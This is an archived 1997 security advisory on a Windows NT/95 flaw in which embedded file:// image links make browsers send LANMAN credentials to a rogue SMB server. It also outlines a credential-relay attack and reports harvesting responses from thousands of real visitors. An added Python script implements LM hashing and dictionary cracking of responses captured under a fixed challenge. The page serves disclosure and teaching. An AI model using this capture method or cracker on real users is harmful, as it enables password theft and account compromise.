WinNT/Win95 Automatic Authentication Vulnerability (IE Bug #4)
Description: Windows NT (and Windows 95 with NetWare client drivers installed) will automatically try to authenticate the logged-in user to any SMB server a web page points it at. A rogue server that serves an embedded image can therefore record the victim's username together with the LANMAN challenge-response, which is computed from the LM hash of the user's password; if the server hands out a fixed challenge, those responses can be attacked offline with a dictionary.
Author: Aaron Spangler <pokee@MAXWELL.EE.WASHINGTON.EDU>
Compromise: Obtain usernames and LANMAN challenge-responses (remote); crackable offline because the server controls the challenge
Vulnerable Systems: Win95 (with NetWare drivers), WinNT 3.51 & 4.0
Date: 14 March 1997
[Note this is edited from http://www.ee.washington.edu/computing/iebug The actual exploit has been changed to 127.0.0.1 to avoid him narfing your password -Fyodor]
Internet Explorer Exploit #4
IE BUG #4 was discovered by Aaron Spangler. First posted Mar 14, 1997.
Internet Explorer 3.02 & 4.0 for NT are still Vulnerable! - March 25th
SO FAR WE HAVE COLLECTED PASSWORDS FROM 2473* UNIQUE SITES SINCE FRIDAY Mar 14th!
550* were crackable within less than 5 minutes.
*Numbers are as of passwords collected since Mar 28. This page has not been updated since because I have been out from work. We just had a new baby son and, because of complications with him and mom, I will not be updating this page for at least a week.
Your favorite web browser may be giving out more information than you want it to, including your username and information about your password.
Known Versions Affected:
The exploit works for both Netscape Navigator 3.01 and Microsoft Internet Explorer 3.01 (even with the security patches applied); earlier versions should work as well but have not yet been tested. The browser is not the deciding factor, the operating system is: you must be using Windows NT (3.51 or 4.0) or the Windows 97 (Memphis) beta. Plain Windows 95 is not supposed to be affected, but several people have reported it working on Windows 95 with NetWare client drivers installed (see the list below). Look below to see how it works.
So far I have been able to confirm this bug on the following test benches:
- Windows 97 Beta (Memphis) - Netscape Communicator 4.0 Preview beta 2
- Windows 97 Beta (Memphis 4.10.1351) - Netscape Navigator 3.0
- Windows 97 Beta (Memphis 4.10.1387) - Internet Explorer 3.01 (with the 3 patches in one)
- Windows NT 3.51 Workstation - Netscape Communicator Preview Release 2
- Windows NT 3.51 Workstation - Netscape Navigator 3.01
- Windows NT 4.0 Server Service Pack 1 - Internet Explorer 3.02
- Windows NT 4.0 Server Service Pack 1 - Internet Explorer 3.01B (build 1215 - 128-bit)
- Windows NT 4.0 Server Service Pack 2 - Internet Explorer 3.01B (with the 3 patches in one)
- Windows NT 4.0 Server Service Pack 2 - Netscape Navigator 3.01p
- Windows NT 4.0 Server Service Pack 2 - Internet Explorer 3.02 (even with the latest one from Microsoft)
- Windows NT 4.0 Server Service Pack 2 - Internet Explorer 4.0 Beta build 544
- Windows NT 4.0 Server (no service pack) - Internet Explorer 3.01A (with only the first patch)
- Windows NT 4.0 Server (no service pack) - Netscape Communicator 4.0 (preview)
- Windows NT 4.0 Workstation (no service pack) - Netscape Navigator 3.01 Gold
- Windows NT 4.0 Workstation Service Pack 1 - Netscape Navigator 3.0
- Windows NT 4.0 Workstation Service Pack 1 - Netscape Navigator 3.01
- Windows NT 4.0 Workstation Service Pack 2 - Internet Explorer 3.01B (with the 3 patches in one)
- Windows NT 4.0 Workstation Service Pack 2 - Internet Explorer 3.02 (even with the latest one from Microsoft)
- Windows NT 4.0 Workstation Service Pack 2 - Internet Explorer 4.0 Beta build 544
- Windows NT 4.0 Workstation Service Pack 2 - Netscape Communicator Preview beta 2
- Windows NT 4.0 Workstation Service Pack 2 - Netscape Communicator 4.0 PR 2
- Windows NT 4.0 Workstation Service Pack 2 - Netscape Communicator Pro PR 2
- Windows NT 4.0 Workstation Service Pack 2 - Netscape Navigator 3.01
- Windows 95 (SP1) with NetWare drivers - Netscape Navigator 3.X (it worked for one individual; not supposed to)
- Windows 95 (OSR2) with NetWare drivers - Internet Explorer 3.0 (4.70.1215 worked for one individual)
- Windows 95 (4.00.950a) with NetWare drivers - Netscape Version 3.0-962223 (worked for one)
- Windows 95 (4.00.950a) with NetWare drivers - Internet Explorer 3.0 (4.70.1158) (worked for one)
- Windows 95 with NetWare drivers - Internet Explorer 3.01b (worked for one)
- Windows 95 Service Pack 1 with NetWare drivers - Internet Explorer 3.02
If you see multicolored (blue,green,yellow) text below, then you are vulnerable.
Picture for file://\\server\share\image.gif:
Picture for file:////server/share/image.gif:
How it Works:
Web page that points to a Rogue SMB Server:
This web page contains two embedded images. They do not reside in the same directory as this page, nor on an HTTP server at all: they reside on an SMB (LAN Manager) file server, referenced by file:// UNC paths. (View the source of this HTML to see the image references.) I borrowed this idea from the last MS Internet Explorer security exploit.
The modified SMB Server:
To download the images, the client must first log on to the LAN Manager server. Windows NT does this without asking the user for confirmation: it sends the server the logged-in username together with the LANMAN challenge-response, which is the user's password hash used to encrypt the challenge the server supplied. The LAN Manager server code has been modified slightly to record the usernames and these hashed-password responses. It has also been modified to hand every client the same fixed challenge value instead of a random one, so each response is a deterministic function of the password alone and can be matched against a dictionary computed once in advance. See NT Password Dictionary Attack for where I got the LAN Manager server idea.
What's the big deal?
First of all, no remote web site should be able to record your username; a site that can do so can compile junk-email lists and sell your name. Secondly, if they hold information about what your password might be and know what site you came from, they can gain access to your computer or local account, compromising your security without your ever knowing about it. With the challenge set to zero, a dictionary attack on the captured response is straightforward: hash each candidate password, encrypt the zero challenge under it, and compare with the recorded response. Sequential brute-force search works as well if you can guess which kinds of characters are most common in the password. It is time-consuming, but if your account gets hacked, is it really worth the risk? It is interesting to note that, in theory, someone could set up a LAN Manager server that opens a simultaneous connection back to the client as each connection comes in. By relaying the challenge issued by the client's own server and passing the client's response straight back to it, the remote server could gain network access to the vulnerable client using the client's own credentials.
Did you really get my username & hashed password?
Take a look at the log so far. Remember these responses are easier to crack because the challenge is set to all zeros! If your client connects with a plaintext password, I do NOT show it in the logs, although some machines have been connecting with unencrypted passwords. Also, to protect the user, I do not show the entire encrypted response in the log. Notice that the most common account (and password) I get is "Administrator".
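The client-side computation and the server-side cracking described in the three sections above, as an added example in Python (not code from the original page, and not Aaron Spangler's modified LAN Manager server). DES is implemented inline so the script runs offline without extra libraries. The victim username "Administrator", the wordlist and the "captured" response are constructed for the demonstration; nothing here comes from the page's logs.

```python
"""Added example (not code from the original page or its author): the LANMAN
challenge/response the rogue SMB server records, and why a fixed all-zero
challenge makes recovering passwords cheap. DES is implemented inline so the
script runs offline. The username, wordlist and "captured" response are
constructed here for illustration; nothing below is taken from the page's logs."""

# --- DES (FIPS 46), integer-based; tables use the spec's 1-indexed bit positions
_PC1 = [57,49,41,33,25,17,9,1,58,50,42,34,26,18,10,2,59,51,43,35,27,19,11,3,60,52,44,36,
        63,55,47,39,31,23,15,7,62,54,46,38,30,22,14,6,61,53,45,37,29,21,13,5,28,20,12,4]
_PC2 = [14,17,11,24,1,5,3,28,15,6,21,10,23,19,12,4,26,8,16,7,27,20,13,2,
        41,52,31,37,47,55,30,40,51,45,33,48,44,49,39,56,34,53,46,42,50,36,29,32]
_P = [16,7,20,21,29,12,28,17,1,15,23,26,5,18,31,10,2,8,24,14,32,27,3,9,19,13,30,6,22,11,4,25]
_IP = [first - 8 * c for first in (58,60,62,64,57,59,61,63) for c in range(8)]
_FP = [0] * 64
for _i, _p in enumerate(_IP):          # final permutation is the inverse of IP
    _FP[_p - 1] = _i + 1
_E = [((4 * b - 1 + k) % 32) + 1 for b in range(8) for k in range(6)]
_SHIFTS = [1,1,2,2,2,2,2,2,1,2,2,2,2,2,2,1]
_S = [[int(ch, 16) for ch in box] for box in (   # each S-box: 4 rows x 16 entries
    "E4D12FB83A6C59070F74E2D1A6CB953841E8D62BFC973A50FC8249175B3EA06D",
    "F18E6B34972DC05A3D47F28EC01A69B50E7BA4D158C6932FD8A13F42B67C05E9",
    "A09E63F51DC7B428D709346A285ECBF1D6498F30B12C5AE71AD069874FE3B52C",
    "7DE3069A1285BC4FD8B56F03472C1AE9A690CB7DF13E52843F06A1D8945BC72E",
    "2C417AB6853FD0E9EB2C47D150FA3986421BAD78F9C5630EB8C71E2D6F09A453",
    "C1AF92680D34E75BAF427C9561DE0B389EF528C3704A1DB6432C95FABE17608D",
    "4B2EF08D3C975A61D0B7491AE35C2F8614BDC37EAF6805926BD814A7950FE23C",
    "D2846FB1A93E50C71FD8A374C56B0E927B419CE206ADF35821E74A8DFC90356B")]

def _permute(x, table, width):
    out = 0
    for pos in table:                  # position 1 is the most significant bit
        out = (out << 1) | ((x >> (width - pos)) & 1)
    return out

def _subkeys(key64):
    k = _permute(key64, _PC1, 64)
    c, d = k >> 28, k & 0xFFFFFFF
    keys = []
    for s in _SHIFTS:
        c = ((c << s) | (c >> (28 - s))) & 0xFFFFFFF
        d = ((d << s) | (d >> (28 - s))) & 0xFFFFFFF
        keys.append(_permute((c << 28) | d, _PC2, 56))
    return keys

def _f(r, k):
    t = _permute(r, _E, 32) ^ k
    out = 0
    for i in range(8):
        v = (t >> (42 - 6 * i)) & 0x3F
        out = (out << 4) | _S[i][(((v >> 4) & 2) | (v & 1)) * 16 + ((v >> 1) & 0xF)]
    return _permute(out, _P, 32)

def des_encrypt_block(key: bytes, block: bytes) -> bytes:
    x = _permute(int.from_bytes(block, "big"), _IP, 64)
    l, r = x >> 32, x & 0xFFFFFFFF
    for k in _subkeys(int.from_bytes(key, "big")):
        l, r = r, l ^ _f(r, k)
    return _permute((r << 32) | l, _FP, 64).to_bytes(8, "big")

# --- LANMAN hash and challenge/response as the NT client computes them
def _des_key_from_7(k7: bytes) -> bytes:
    """Spread 56 key bits over 8 bytes; DES ignores the low (parity) bit of each byte."""
    n = int.from_bytes(k7, "big")
    return bytes(((n >> (49 - 7 * i)) & 0x7F) << 1 for i in range(8))

def lm_hash(password: str) -> bytes:
    """Upper-case, pad to 14 bytes, DES-encrypt the constant "KGS!@#$%" under each 7-byte half."""
    pw = password.upper().encode("ascii", "replace")[:14].ljust(14, b"\0")
    return b"".join(des_encrypt_block(_des_key_from_7(pw[i:i + 7]), b"KGS!@#$%") for i in (0, 7))

def lm_response(password: str, challenge: bytes) -> bytes:
    """24-byte response: the 16-byte hash padded to 21 bytes, used as three DES keys on the challenge."""
    h = lm_hash(password) + b"\0" * 5
    return b"".join(des_encrypt_block(_des_key_from_7(h[i:i + 7]), challenge) for i in (0, 7, 14))

# --- what the modified server gains from handing every client the same challenge
ZERO_CHALLENGE = b"\0" * 8

def build_response_table(challenge: bytes, wordlist) -> dict:
    """One-time precomputation: with a fixed challenge every future capture is a dict lookup."""
    return {lm_response(w, challenge): w for w in wordlist}

def crack_lm_response(challenge: bytes, response: bytes, wordlist):
    """Per-capture dictionary pass (what a random challenge would force for every victim)."""
    return next((w for w in wordlist if lm_response(w, challenge) == response), None)

def password_is_short(challenge: bytes, response: bytes) -> bool:
    """Passwords of 7 chars or fewer have second hash half AAD3B435B51404EE, so the third
    DES key is 04 EE 00 00 00 00 00 and the last response block is a known constant."""
    k = _des_key_from_7(bytes.fromhex("04EE") + b"\0" * 5)
    return response[16:24] == des_encrypt_block(k, challenge)

# Constructed log entry (assumption): a victim whose password is "secret" hit the page.
CAPTURED_USER = "Administrator"
CAPTURED_RESPONSE = lm_response("secret", ZERO_CHALLENGE)
WORDLIST = ["letmein", "password", "welcome", "secret"]

if __name__ == "__main__":
    print(CAPTURED_USER, CAPTURED_RESPONSE.hex())
    print("7 chars or fewer:", password_is_short(ZERO_CHALLENGE, CAPTURED_RESPONSE))
    print("cracked:", build_response_table(ZERO_CHALLENGE, WORDLIST).get(CAPTURED_RESPONSE))
```

The contrast between `build_response_table` and `crack_lm_response` is the point of the fixed challenge: with a random challenge the server would have to rerun the whole wordlist for every captured response, whereas with a constant challenge the table is computed once and each capture costs one lookup. `password_is_short` shows a second consequence: because the third response block depends only on the last two hash bytes, and those are constant for any password of seven characters or fewer, the server can tell at a glance which captured accounts have short passwords.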
- New York Times Newspaper - Take a look at the Cyber Times Section
- KNWX 770 AM All news radio broadcasted throughout Saturday March 22
- New Fix is Still Vulnerable. Has not even been fixed yet! - March 25th
- Wired.com - Good article.
- BrowserWatch (iWorld)
- NEWS.COM -March 20th
- Pipeline News - March 20th
- More Pipeline News - March 27th
- NTsecurity News
- W.W.W. Security FAQ
- Unofficial MS Internet Explorer Security FAQ
- Even News in Germany...
- NETSURFER Digest
- IE Bug #1 .url/ .lnk files - Paul Greene
- IE Bug #2 Programs from web without asking - David Ross
- IE Bug #3: .isp files - Chris Rioux & Tim Machinta
- IE Bug #4: (This page) - Aaron Spangler
- IE Bug #5: Similar Exploit but uses NTLM instead of SMB - Paul Ashton
- IE Bug #6: Windows 95 and MSIE Security Hole - Steve Birnbaum
Mirrors of this Page
- A mirror of this page - The NT Shop
- A mirror of this page - Coming soon
- A mirror of this page
Disclaimer
Aaron Spangler and the University of Washington will not be held liable for any damage caused from/by this page. This page was set up merely to demonstrate that there is a significant security hole and that Microsoft needs to fix it. If your password is grabbed, CHANGE YOUR PASSWORD IMMEDIATELY!
The master index of all exploits is available here (Very large file)
This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: